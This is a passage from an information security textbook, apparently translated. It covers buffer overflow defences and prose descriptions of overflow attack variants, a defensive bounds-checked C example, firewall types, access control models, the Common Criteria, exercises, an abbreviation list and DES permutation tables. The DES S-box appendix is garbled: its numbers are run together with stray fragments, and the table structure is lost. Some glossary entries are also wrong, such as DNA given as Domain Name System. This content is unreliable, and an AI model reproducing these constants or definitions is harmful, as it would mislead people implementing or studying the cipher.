code, and after review of old code. Treat buffer overflow safety as a subset of general safe coding techniques. Pay attention to small errors, and check that there is sufficient space in any buffer.

Safety extensions to C have been proposed; they incur a performance penalty, and programs must be compiled with a special compiler. There are several safer variants of the standard library with new functions, such as strlcpy(). Some standard functions have safer re-implementations as a dynamic library, for example Libsafe.

Stack protection adds function entry and exit code that checks the stack for signs of overwriting. It uses a random value as a stack guard and checks for overwriting between the local variables and the saved frame pointer and return address. The program aborts if a change is detected. Issues: recompilation and debugger support. Alternatively, a safe copy of the return address is saved and checked.

Run-time defences
Use virtual memory support to make some regions of memory non-executable, such as the stack, heap and global data. This needs support from the memory hardware, as in SPARC / Solaris systems and x86 Linux/Unix/Windows systems. Issue: support for code that needs an executable stack requires some special provisions.

Manipulate the location of key data structures, using a random shift for each process. The large address range on modern systems makes the space wasted negligible and makes guessing the address of the target buffer infeasible. Randomise the location of heap buffers and of the standard library functions.

Place guard pages between critical regions of memory; they are flagged in memory as illegal addresses. They can even be placed between stack frames and heap buffers, at a cost in execution time and in space.

There are many other attack variants: stack overflow variants, heap overflow, global data overflow, format string overflow, integer overflow. More may be discovered in the future. Some cannot be prevented unless the code is safe in the first place.

One stack overflow variant overwrites only the buffer and the saved frame pointer, so the return occurs but to a fake frame, and control returns to a function call controlled by the attacker. It is used when the buffer overflow is limited, for example an off-by-one. It has limitations: the exact address of the buffer must be known, and the calling function executes with the fake frame. Another stack overflow variant replaces the return address with a standard library function, in response to non-executable stack defences. The attacker constructs suitable parameters on the stack above the return address. The attacker may need the exact address of the buffer, and can even chain two library calls.

There are also attacks on buffers located in the heap. 
The heap is normally located above the program code, and its memory is requested by the program for use in dynamic data structures, for example linked lists. There is no return address, so there is no easy transfer of control. The attacker may have function pointers to exploit, or may manipulate management data structures. The defences are a randomised and non-executable heap.

Buffers located in global data can also be attacked. This data may be located above the program code. The attack applies if there is a function pointer next to a vulnerable buffer, or adjacent process management tables. It aims to overwrite a function pointer that is called later. The defences are a randomised and non-executable global data region, moving function pointers, and guard pages.
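The compile-time defence described above (checking that there is enough space in a buffer before writing to it, in the spirit of bounded functions such as strlcpy()), applied to the buffer1 program of VIII.3.1. This is an added example, not code from the textbook: copy_bounded(), check_input() and struct tag_check are names introduced here, and next_tag() is assumed to supply the string START as the text describes.

```c
#include <stdio.h>
#include <string.h>

#define TAG_SIZE 8              /* same size as str1 and str2 in buffer1.c */

/* Result of one check; hypothetical type used only in this example. */
struct tag_check {
    char str1[TAG_SIZE];        /* expected tag */
    char str2[TAG_SIZE];        /* user input, filled only via copy_bounded() */
    int  valid;                 /* 1 = input matches the tag, 0 = it does not */
    int  rejected;              /* 1 = input did not fit and was not copied */
};

/*
 * Copy src into dst only if it fits, including the terminating NUL.
 * Unlike gets(), it never writes past dst; unlike silent truncation,
 * it treats an over-long input as an error.
 * Returns 0 on success, -1 if src is too long (dst is set to "").
 */
static int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);

    if (dstsz == 0)
        return -1;
    if (len >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Assumption: next_tag() in the page's program supplies "START". */
static void next_tag(char dst[TAG_SIZE])
{
    copy_bounded(dst, TAG_SIZE, "START");
}

/* Hardened equivalent of the body of main() in buffer1.c. */
struct tag_check check_input(const char *input)
{
    struct tag_check r;

    memset(&r, 0, sizeof r);
    next_tag(r.str1);
    if (copy_bounded(r.str2, sizeof r.str2, input) != 0) {
        r.rejected = 1;         /* over-long input: str1 is untouched */
        return r;
    }
    if (strncmp(r.str1, r.str2, TAG_SIZE) == 0)
        r.valid = 1;
    return r;
}

int main(void)
{
    char line[128];             /* fgets() is bounded by this size */
    struct tag_check r;

    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    line[strcspn(line, "\n")] = '\0';   /* strip the newline, if any */

    r = check_input(line);
    if (r.rejected)
        printf("buffer1: input rejected (more than %d characters)\n",
               TAG_SIZE - 1);
    else
        printf("buffer1: str1(%s), str2(%s), valid(%d)\n",
               r.str1, r.str2, r.valid);
    return r.valid ? 0 : 1;
}
```

With the three inputs from the figure, START is still accepted, while EVILINPUTVALUE and BADINPUTBADINPUT are rejected before any byte reaches str2, so str1 keeps the value START and the third run no longer yields valid(1).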

VIII.4 Firewalls

VIII.4.1 Introduction
Firewalls have developed strongly and are used throughout information systems. Everyone now wants to be on the Internet and on interconnected networks, so security is a persistent concern. It is not easy to secure every system in an organisation. A firewall is normally used to provide a perimeter defence as part of a comprehensive security strategy.

What is a firewall
It is a choke point for control and monitoring. It interconnects networks with differing trust and imposes restrictions on network services, for example only authorised traffic is allowed. It audits and controls access, and alarms can be set for abnormal behaviour. It provides NAT and usage monitoring. It can implement virtual private networks (VPN) using the IPSec security mechanism. The firewall itself should be immune to penetration.

Firewall limitations
It cannot protect against attacks that bypass it, for example sneaker net and modems. It also gets in the way of trusted organisations and trusted services (SSL/SSH). It cannot protect against internal threats, for example disgruntled employees or those colluding with an outsider. It cannot protect against the transfer of virus-infected programs or files, because of the very wide range of file types and operating systems.

VIII.4.2 Firewalls: packet filters
This is the simplest and fastest firewall component and the foundation of any firewall system. It examines each IP packet (without context) and permits or denies it according to defined rules. It therefore restricts access to services and ports. The possible default policies are:
o That which is not expressly permitted is prohibited
o That which is not expressly prohibited is permitted


Attacks on packet filters
IP address spoofing: the source address is faked so that the packet is trusted. Countermeasure: add filters on the router to block it.
Source routing attacks: the attacker sets a route other than the default. Countermeasure: block source-routed packets.
Tiny fragment attacks: the header information is split across several tiny fragments. Countermeasure: either discard them or reassemble them before checking.

Firewalls: stateful packet filters
Traditional packet filters do not examine higher-layer context, that is, they do not match returning packets with the outgoing flow. Stateful packet filters address this need. They examine each IP packet in context: they keep track of client-server sessions and check that each packet validly belongs to one. They are therefore better able to detect bogus packets out of context.

VIII.4.3 Firewalls: application-level gateway (or proxy)
There is an application-specific gateway, the proxy. It has full access to the protocol:
o The user requests the service from the proxy
o The proxy checks that the request is legitimate
o It then handles the request and returns the result to the user
o It can log/audit traffic at application level
Separate proxies are needed for each service:
o Some services naturally support proxying
o Others are more problematic


VIII.4.4 Firewalls: circuit-level gateway
It relays two TCP connections. It imposes security by limiting which such connections are allowed. Once a relay has been set up, it normally does not examine the contents. It is typically used when internal users are trusted, by allowing general outbound connections. The SOCKS package is widely used for this purpose.

VIII.4.5 Bastion host
A highly secure host system. It runs circuit-level and application-level gateways, or provides externally accessible services. It is potentially exposed to hostile elements. It is therefore secured to withstand this: hardened operating system, essential services only, extra authentication, and proxies that are small, secure, independent and non-privileged. It may support two or more network connections and may be trusted to enforce the policy of trusted separation between these network connections.

Firewall configurations


VIII.4.6 Access control
Given that the system has identified a user, it determines which resources that user can access. The general model is an access matrix with:
o Subject: an active entity (user, process)
o Object: a passive entity (file or resource)
o Access right: the way in which the object can be accessed
It can be decomposed by:
o Columns, as access control lists
o Rows, as capability tickets

Access control matrix


VIII.4.7 Trusted computer systems
Information security is increasingly important. Information has varying degrees of sensitivity:
o Military information classifications: confidential, secret
Subjects (people or programs) have varying rights of access to objects (information). This is known as multilevel security:
o Subjects have a maximum and a current security level
o Objects have a fixed security level classification
We want to consider ways of increasing confidence in systems to enforce these rights.

VIII.4.8 The Bell LaPadula model
One of the best-known security models. It is implemented as mandatory policies on the system. It has two key policies:
o No read up (simple security property)
  - A subject can only read/write an object if the current security level of the subject dominates (>=) the classification of the object
o No write down (*-property)
  - A subject can only append/write to an object if the current security level of the subject is dominated by (<=) the classification of the object

Reference Monitor


Evaluated computer systems
Governments can evaluate IT systems, against a range of standards:
o TCSEC, IPSEC and now the Common Criteria
These define a number of evaluation levels with increasingly stringent checking. Lists of evaluated products have been published:
o Aimed only at government/defence use
o They can also be useful in industry

VIII.4.9 Common Criteria
An international initiative that specifies security requirements and defines evaluation criteria. It incorporates earlier standards:
o For example CSEC, ITSEC, CTCPEC (Canada), Federal (US)
It specifies standards for:
o Evaluation criteria
o Methodology for application of the criteria
o Administrative procedures for evaluation, certification and accreditation schemes
It defines a set of security requirements and has a target of evaluation (TOE). Requirements fall into two categories:
o Functional
o Assurance
Both are organised in classes of families and components.

Common Criteria requirements
Functional requirements

o Security audit, cryptographic support, communications, user data protection, identification and authentication, security management, privacy, protection of the trusted security functions, resource utilisation, TOE access, trusted path
Assurance requirements
o Configuration management, delivery and operation, development, guidance documents, life cycle support, tests, vulnerability assessment, assurance maintenance

Exercises
1. List and classify the types of malicious software and the countermeasures against them.
2. Analyse the techniques for intruding into systems and how to prevent them.
3. Describe measures for strengthening the security of a personal computer using commonly available software.
4. State the purpose and requirements of building a firewall. What types of firewall are there?
5. Describe how to set up a firewall using the supporting tools in the operating system.
6. Analyse the buffer overflow errors that can occur and give their causes.
7. Study the requirements of secure programming.
8. Present some models of trusted computer systems.

LIST OF SYMBOLS AND ABBREVIATIONS

No.  Abbreviation  Meaning
1    ACL    Access Control List
2    AES    Advanced Encryption Standard (international encryption standard)
3    AH     Authentication Header
4    CA     Certification authority
5    CERT   Computer emergency response team
6    CRL    Certificate revocation list
7    CSDL   Cơ sở dữ liệu (database)
8    CNTT   Công nghệ thông tin (information technology)
9    CSHT   Cơ sở hạ tầng (infrastructure)
10   CBC    Cipher Block Chaining
11   CFB    Cipher feedback
12   DBA    Database administrator
13   DES    Data Encryption Standards
14   DNA    Domain Name System
15   DSA    Digital signature Algorithm
16   DSS    Digital signature standard
17   ECB    Electronic codebook
18   ECC    Encryption curve code (elliptic curve code)
19   ESP    Encapsulating security payload
20   FIPS   Federal Information Processing Standard
21   IDEA   International data encryption algorithm

22   IPKI   Internet X.509 public key Infrastructure
23   KDC    Key Distribution Center
24   LAN    Local area network
25   MD     Message digest
26   NAT    Network address translation
27   PKCS   Public key cryptography standard
28   PKI    Public Key Infrastructure
29   PGP    Pretty Good Privacy (e-mail security software)
30   RSA    The RSA public-key encryption algorithm, named after Rivest, Shamir, Adleman
31   SET    Secure Electronic transaction
32   SHA1   Secure hash algorithm 1
33   SMTP   Simple Mail Transfer Protocol
34   SOAP   Simple Object Access Protocol
35   SSL    Secure Socket Layer (transport-layer security protocol)
36   TLS    Transport Layer Security (transport-layer security protocol standard)
37   UID    User Identification
38   TTP    Trusted Third Party
39   URL    Uniform Resource Locator
40   VPN    Virtual private network
41   WAN    Wide area network
42   WTLS   Wireless transport layer security


APPENDIX

1. Appendix: the DES algorithm

1.1 Appendix 1.1: IP

58 50 42 34 26 18 10  2
60 52 44 36 28 20 12  4
62 54 46 38 30 22 14  6
64 56 48 40 32 24 16  8
57 49 41 33 25 17  9  1
59 51 43 35 27 19 11  3
61 53 45 37 29 21 13  5
63 55 47 39 31 23 15  7

1.2 Appendix 1.2: IP-1

40  8 48 16 56 24 64 32
39  7 47 15 55 23 63 31
38  6 46 14 54 22 62 30
37  5 45 13 53 21 61 29
36  4 44 12 52 20 60 28
35  3 43 11 51 19 59 27
34  2 42 10 50 18 58 26
33  1 41  9 49 17 57 25

1.3 Appendix 1.3: E

32  1  2  3  4  5
 4  5  6  7  8  9
 8  9 10 11 12 13
12 13 14 15 16 17
16 17 18 19 20 21
20 21 22 23 24 25
24 25 26 27 28 29
28 29 30 31 32  1

1.4 Appendix 1.4: S-boxes

- 146 Ct [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [0] [1] [2] [3] [4] [5] [6] [7] 14 0 4 15 15 3 0 13 10 13 13 1 7 13 10 3 2 14 4 11 12 10 9 4 4 13 1 6 13 1 7 2 4 15 1 12 1 13 14 8 0 7 6 10 13 8 6 15 12 11 2 8 1 15 14 3 11 0 4 11 2 15 11 1 13 7 14 8 8 4 7 10 9 0 4 13 14 11 9 0 4 2 1 12 10 4 15 2 2 11 11 13 8 13 4 14 1 4 8 2 14 7 11 1 14 9 9 0 3 5 0 6 1 12 11 7 15 2 5 12 14 7 13 8 4 8 1 7 2 14 13 4 6 15 10 3 6 3 8 6 0 6 12 10 7 4 10 1 9 7 2 9 15 4 12 1 6 10 9 4 15 2 6 9 11 2 4 15 3 4 15 9 6 15 11 1 10 7 13 14 2 12 8 5 0 9 3 4 15 3 12 10 11 13 2 1 3 8 13 4 15 6 3 8 9 0 7 13 11 13 7 2 6 9 12 15 8 1 7 10 11 7 14 8 8 1 11 7 4 14 1 2 5 10 0 7 10 3 13 8 6 1 8 13 8 5 3 10 13 10 14 7 1 4 2 13 Hng [8] [9] S1 3 10 10 6 15 12 5 11 S2 9 7 12 0 5 8 11 6 S3 1 13 2 8 11 1 4 15 S4 1 2 4 7 15 1 9 4 S5 8 5 5 0 15 9 6 15 S6 0 13 6 1 7 0 11 14 S7 3 12 14 3 10 15 9 5 S8 10. 9 12 5 0 6 15 12 [10] [11] [12] [13] [14] [15] 6 12 9 3 2 1 12 7 12 5 2 14 8 2 3 5 3 15 12 0 3 13 4 1 9 5 6 0 3 6 10 9 12 11 7 14 13 10 6 12 7 14 12 3 5 12 14 11 15 10 5 9 4 14 10 7 7 12 8 15 14 11 13 0 5 9 3 10 12 6 9 0 11 12 5 11 11 1 5 12 13 3 6 10 14 0 1 6 5 2 0 14 5 0 15 3 9 5 10 0 0 9 3 5 4 11 10 5 12 10 2 7 0 9 3 4 7 11 13 0 10 15 5 2 0 14 3 5 0 3 5 6 5 11 2 14 2 15 14 2 4 14 8 2 14 8 0 5 5 3 11 8 6 8 9 3 12 9 5 6 7 8 0 13 10 5 15 9 8 1 7 12 15 9 4 14 9 6 14 3 11 8 6 13 1 6 2 12 7 2 8 11


1.5 Appendix 1.5: P

16  7 20 21
29 12 28 17
 1 15 23 26
 5 18 31 10
 2  8 24 14
32 27  3  9
19 13 30  6
22 11  4 25

1.6 Appendix 1.6: PC1

57 49 41 33 25 17  9
 1 58 50 42 34 26 18
10  2 59 51 43 35 27
19 11  3 60 52 44 36
63 55 47 39 31 23 15
 7 62 54 46 38 30 22
14  6 61 53 45 37 29
21 13  5 28 20 12  4

1.7 Appendix 1.7: PC2

14 17 11 24  1  5
 3 28 15  6 21 10
23 19 12  4 26  8
16  7 27 20 13  2
41 52 31 37 47 55
30 40 51 45 33 48
44 49 39 56 34 53
46 42 50 36 29 32
